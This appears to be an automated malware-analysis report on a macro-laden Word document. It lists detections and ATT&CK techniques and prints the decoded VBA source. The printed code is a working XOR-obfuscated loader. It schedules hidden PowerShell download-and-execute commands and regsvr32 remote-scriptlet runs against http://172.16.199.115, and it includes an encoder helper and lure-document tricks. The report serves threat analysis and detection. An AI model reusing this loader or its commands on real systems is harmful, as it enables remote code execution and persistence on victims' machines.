Verdict: MALICIOUS
Risk Score: 552

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059.001 PowerShell
- T1203 Exploitation for Client Execution
- T1140 Deobfuscate/Decode Files or Information
The sample contains a VBA macro with an AutoOpen function that uses WScript.Shell to execute a PowerShell command. The script appears to be obfuscated and likely decodes and executes a payload fetched from a remote source, as indicated by the embedded URLs. The presence of `Shell()` and `CreateObject()` calls, together with references to PowerShell and WScript, strongly suggests downloader or dropper functionality.
Heuristics (15)

- ClamAV: Doc.Dropper.Agent-6544801-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6544801-0
- VBA macros detected (medium, OLE_VBA_MACROS, 7 related findings): Document contains VBA macro code
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT): WScript.Shell usage. Matched line in script: `'schtasks.exe /Create /TN \Windows-Service\srcP01 /ST 01:00 /SC ONCE /TR "wscript //E:VBScript .\test1.txt 'WScript.Shell' 'powershell.exe -nop -w hidden -c' 'IEX ((new-object net.webclient).downloadstring(' 'http://172.16.199.115:80/a' '))'" /f lol1 = "1C17001D0F143F1C7D001D2D455D263C0A151C0C4E480021733932210B160A391C593B0C1C113D0C3639163A0622"`
- PowerShell reference in VBA (critical, OLE_VBA_PS): PowerShell reference in VBA. Matched line in script: `'schtasks.exe /Create /TN \Windows-Service\srcP01 /ST 01:00 /SC ONCE /TR "wscript //E:VBScript .\test1.txt 'WScript.Shell' 'powershell.exe -nop -w hidden -c' 'IEX ((new-object net.webclient).downloadstring(' 'http://172.16.199.115:80/a' '))'" /f lol1 = "1C17001D0F143F1C7D001D2D455D263C0A151C0C4E480021733932210B160A391C593B0C1C113D0C3639163A0622"`
- LOLBin reference in VBA (critical, OLE_VBA_LOLBIN): LOLBin reference in VBA. Matched line in script: `Set wt = VBA.CreateObject(XORDecryption("NothingToSeeHere", lmao)) 'schtasks.exe /Create /TN \Windows-Service\srcR1 /ST 01:00 /SC ONCE /TR "regsvr32 /s /n /u /i:http://172.16.199.115:80/akhgkgjk scrobj.dll" /f lol1 = "1C17001D0F143F1C7D001D2D455D263C0A151C0C4E480021733932210B160A391C593B0C1C113D0C3639163A0620"`
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line in script: `lmao = "38270b1b07172041000d002409" Set wt = VBA.CreateObject(XORDecryption("NothingToSeeHere", lmao)) dir = wt.ExpandEnvironmentStrings("%temp%\test1.txt")`
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: `lmao = "38270b1b07172041000d002409" Set wt = VBA.CreateObject(XORDecryption("NothingToSeeHere", lmao)) dir = wt.ExpandEnvironmentStrings("%temp%\test1.txt")`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Sub AutoOpen() If ActiveDocument.ProtectionType <> wdNoProtection Then`
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- Reference to Windows Script Host (high, SC_STR_WSCRIPT): Reference to Windows Script Host
- LOLBin token sequence in document text (high, SE_LOLBIN_RUN_COMMAND): Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, ...) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies or, in macro-laden Office files, the macro's own string-pool entries appearing adjacent in extracted text.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://172.16.199.115:80/a (in document text, OLE body)
  - http://172.16.199.115:80/akhgkgjk (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 26348 bytes |

SHA-256: 92cde5b5d91bc6f4da813e9a9b2c8a6a6b86fc5731f9e3f818c9c0427b2504f2

Detection (ClamAV): No threats found

Obfuscation or payload: likely. Carved artifact contains 4 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script):

```vba
' --- Stream Macros/VBA/ThisDocument (module attributes only, no code) ---
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' --- Stream Macros/VBA/Module1 ---
Attribute VB_Name = "Module1"

' Hex-string XOR decoder: two hex digits per output character, XORed with a
' repeating key. Note the key index starts at the key's second character.
Public Function XORDecryption(CodeKey As String, DataIn As String) As String
    Dim lonDataPtr As Long
    Dim strDataOut As String
    Dim intXOrValue1 As Integer
    Dim intXOrValue2 As Integer
    For lonDataPtr = 1 To (Len(DataIn) / 2)
        'The first value to be XOr-ed comes from the data to be encrypted
        intXOrValue1 = Val("&H" & (Mid$(DataIn, (2 * lonDataPtr) - 1, 2)))
        'The second value comes from the code key
        intXOrValue2 = Asc(Mid$(CodeKey, ((lonDataPtr Mod Len(CodeKey)) + 1), 1))
        strDataOut = strDataOut + Chr(intXOrValue1 Xor intXOrValue2)
    Next lonDataPtr
    XORDecryption = strDataOut
End Function

' Inverse of XORDecryption: plaintext in, upper-case hex string out.
' Only used by runEncrypt (the author's helper for producing the encoded strings).
Public Function XOREncryption(CodeKey As String, DataIn As String) As String
    Dim lonDataPtr As Long
    Dim strDataOut As String
    Dim temp As Integer
    Dim tempstring As String
    Dim intXOrValue1 As Integer
    Dim intXOrValue2 As Integer
    For lonDataPtr = 1 To Len(DataIn)
        'The first value to be XOr-ed comes from the data to be encrypted
        intXOrValue1 = Asc(Mid$(DataIn, lonDataPtr, 1))
        'The second value comes from the code key
        intXOrValue2 = Asc(Mid$(CodeKey, ((lonDataPtr Mod Len(CodeKey)) + 1), 1))
        temp = (intXOrValue1 Xor intXOrValue2)
        tempstring = Hex(temp)
        If Len(tempstring) = 1 Then tempstring = "0" & tempstring
        strDataOut = strDataOut + tempstring
    Next lonDataPtr
    XOREncryption = strDataOut
End Function

' Drops a two-line VBScript stager to %temp%\test1.txt and registers scheduled
' tasks that run it with wscript. The commented-out lines are the plaintext
' of the XOR-encoded strings next to them.
Public Function runPow()
    Dim dir As String
    Dim lol As String
    Dim lol1 As String
    Dim lol2 As String
    Dim lol3 As String
    Dim lol4 As String
    Dim lol5 As String
    Dim lmao As String
    Dim wt As Object
    Dim windowStyle As Integer: windowStyle = 0
    Dim waitOnReturn As Boolean: waitOnReturn = False
    lmao = "38270b1b07172041000d002409"   ' decodes to "WScript.Shell"
    Set wt = VBA.CreateObject(XORDecryption("NothingToSeeHere", lmao))
    dir = wt.ExpandEnvironmentStrings("%temp%\test1.txt")
    Dim objStream
    Dim data As String
    Set objStream = CreateObject("ADODB.Stream")
    objStream.Open
    'Set wt = CreateObject(WScript.Arguments(0))
    data = "3C111C49191374527326172D040600010D1E0D0A1A4F033C30170C38115C243C0801050C00132747634C4C"
    objStream.WriteText XORDecryption("NothingToSeeHere", data) + Chr(13) + Chr(10)
    'wt.Run WScript.Arguments(1) + " " +chr(34)+WScript.Arguments(2)+chr(39)+WScript.Arguments(3)+chr(39)+WScript.Arguments(4)+chr(34),0
    data = "1800463B1B0974380006172115064B0F1D131D040B09201C7B544C684E52476E4D54430A06157C5C674C4E1F361117271F0046281C002102360B113B4D404C650C1C1A415D5E7D440436063A0C0211602E060F1C03023A1B204D56614E110D3C474751404530070C210C153C4B3317291A190D071A147C5B7A4E0620175A567A465858"
    objStream.WriteText XORDecryption("NothingToSeeHere", data) + Chr(13) + Chr(10)
    objStream.SaveToFile dir, 2
    objStream.Close
    'schtasks.exe /Create /TN \Windows-Service\srcP01 /ST 01:00 /SC ONCE /TR "wscript //E:VBScript .\test1.txt 'WScript.Shell' 'powershell.exe -nop -w hidden -c' 'IEX ((new-object net.webclient).downloadstring(' 'http://172.16.199.115:80/a' '))'" /f
    lol1 = "1C17001D0F143F1C7D001D2D455D263C0A151C0C4E480021733932210B160A391C593B0C1C113D0C3639163A0622"
    lol2 = "4F5B3B3D4E"
    lol3 = "554458494134174F1C2B260D455D311C4F561F1A0D153D1F27454A672048330C3C171A001E1374"
    lol4 = "4F533F3A0D153D1F274B3620001E09694F5318061902261C3B0009244B171D2B4F5906061E477918730D0C2C01170B6E42174F49492E1137734D4D26000548210D1E0D0A1A473A0A274B122D071109270A1A1C4040033B183D090A290101113C061A0F41494773"
    lol5 = "48544F404740764F7C03"
    ' Twelve tasks: the two-digit value (01, 03, ..., 23) is spliced in after
    ' lol1 (task-name suffix) and after lol2 (start hour), so the command
    ' template above is registered once every two hours.
    Dim hour As Integer
    For hour = 0 To 11
        lol = XORDecryption("NothingToSeeHere", lol1)
        lol = lol + Format(hour * 2 + 1, "00")
        lol = lol + XORDecryption("NothingToSeeHere", lol2)
        lol = lol + Format(hour * 2 + 1, "00")
        lol = lol + XORDecryption("NothingToSeeHere", lol3)
        lol = lol + dir
        lol = lol + XORDecryption("NothingToSeeHere", lol4)
        lol = lol + "http://172.16.199.115:80/a"
        lol = lol + XORDecryption("NothingToSeeHere", lol5)
        wt.Run lol, windowStyle, waitOnReturn
    Next hour
    'schtasks.exe /Run /TN \Windows-Service\srcP01
    lol = "1C17001D0F143F1C7D001D2D455D373B0154473D204708383A0B01271201481D0A061E000D02081C2106357854"
    wt.Run XORDecryption("NothingToSeeHere", lol), windowStyle, waitOnReturn
End Function

' Same task-registration pattern as runPow, but the task runs regsvr32 with a
' remote scriptlet (the commented-out line is the plaintext template).
Public Function runReg()
    Dim lmao As String
    Dim lol As String
    Dim lol1 As String
    Dim lol2 As String
    Dim lol3 As String
    Dim lol4 As String
    Dim wt As Object
    Dim windowStyle As Integer: windowStyle = 0
    Dim waitOnReturn As Boolean: waitOnReturn = False
    lmao = "38270b1b07172041000d002409"   ' decodes to "WScript.Shell"
    Set wt = VBA.CreateObject(XORDecryption("NothingToSeeHere", lmao))
    'schtasks.exe /Create /TN \Windows-Service\srcR1 /ST 01:00 /SC ONCE /TR "regsvr32 /s /n /u /i:http://172.16.199.115:80/akhgkgjk scrobj.dll" /f
    lol1 = "1C17001D0F143F1C7D001D2D455D263C0A151C0C4E480021733932210B160A391C593B0C1C113D0C3639163A0620"
    lol2 = "4F5B3B3D4E"
    lol3 = "554458494134174F1C2B260D455D311C4F561A0C0914221D6057456716524A204F5B1D49410E6E"
    lol4 = "4F070B1B01053E413709096A455D03"
    Dim hour As Integer
    For hour = 0 To 11
        lol = XORDecryption("NothingToSeeHere", lol1)
        lol = lol + Format(hour * 2 + 1, "00")
        lol = lol + XORDecryption("NothingToSeeHere", lol2)
        lol = lol + Format(hour * 2 + 1, "00")
        lol = lol + XORDecryption("NothingToSeeHere", lol3)
        lol = lol + "http://172.16.199.115:80/akhgkgjk"
        lol = lol + XORDecryption("NothingToSeeHere", lol4)
        wt.Run lol, windowStyle, waitOnReturn
    Next hour
    'schtasks.exe /run /TN \Windows-Service\srcR01
    lol = "1C17001D0F143F1C7D001D2D455D173B0154473D204708383A0B01271201481D0A061E000D02081C2106377854"
    wt.Run XORDecryption("NothingToSeeHere", lol), windowStyle, waitOnReturn
End Function

' Author-side helper left in the sample: prompts for a string, shows its
' XOR-encoded hex form and optionally copies it to the clipboard.
Public Function runEncrypt()
    Dim lol As String
    Dim obj As String
    Dim answer As Integer
    lol = InputBox("Please enter your command", "Encryption")
    lol = XOREncryption("NothingToSeeHere", lol)
    answer = MsgBox(lol, vbYesNo + vbQuestion, "Copy CipherText to Clipboard")
    If answer = vbYes Then
        Dim MSForms_DataObject As Object
        Set MSForms_DataObject = CreateObject("new:{1C3B4210-F441-11CE-B9EA-00AA006B1A69}")
        MSForms_DataObject.SetText lol
        MSForms_DataObject.PutInClipboard
        Set MSForms_DataObject = Nothing
    End If
End Function

' Lure handling: overlays a full-page picture on every page (the image path
' is the author's local machine) and names each shape "BabyRoshan<page>".
Public Function InsertImage()
    Dim imagePath As String
    Dim i As Integer
    Dim pagenum As String
    Dim TtlPgs As Integer
    TtlPgs = Selection.Information(wdNumberOfPagesInDocument)
    For i = 1 To TtlPgs
        Selection.HomeKey Unit:=wdStory
        imagePath = "C:\Users\Tester\Desktop\123.png"
        ActiveDocument.GoTo(What:=wdGoToPage, Count:=i).Select
        ActiveDocument.Shapes.AddPicture(FileName:=imagePath, _
            LinkToFile:=False, _
            SaveWithDocument:=True, _
            Left:=-72, _
            Top:=-57, _
            Anchor:=Selection.Range, _
            Width:=600, _
            Height:=842).Select
        pagenum = i
        Selection.ShapeRange.Name = "BabyRoshan" + pagenum
    Next i
End Function

Public Function RemovePicture()
    Dim i As Integer
    With ActiveDocument
        For i = 1 To .InlineShapes.Count
            .InlineShapes(i).ConvertToShape
        Next i
        .Shapes.SelectAll
        Selection.Delete
    End With
End Function

Public Function UnprotectReadOnly()
    If ActiveDocument.ProtectionType <> wdNoProtection Then
        ActiveDocument.Unprotect Password:="ahihiihaha"
    End If
End Function

Public Function ProtectReadOnly()
    If ActiveDocument.ProtectionType = wdNoProtection Then
        ActiveDocument.Protect Password:="ahihiihaha", NoReset:=False, Type:= _
            wdAllowOnlyReading, UseIRM:=False, EnforceStyleLock:=False
    End If
End Function

Public Function Black()
    Selection.WholeStory
    Selection.Font.Color = -587137025
End Function

Public Function White()
    Selection.WholeStory
    Selection.Font.Color = -603914241
End Function

' Auto-exec entry point. A protected (armed) document is unprotected, its text
' turned black and the picture overlay removed; an unprotected one is whitened,
' overlaid and protected (the arming step). In this build both loader calls
' (runReg, runPow) are commented out.
Sub AutoOpen()
    If ActiveDocument.ProtectionType <> wdNoProtection Then
        ActiveWindow.View = wdPrintView
        UnprotectReadOnly
        Black
        'runReg
        'runPow
        RemovePicture
    Else
        White
        InsertImage
        ProtectReadOnly
    End If
End Sub

' --- Header of the p-code disassembly appended to the extracted script ---
' Processing file: /tmp/qstore_b48516i1
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 924 bytes
' Macros/VBA/Module1 - 15072 bytes
```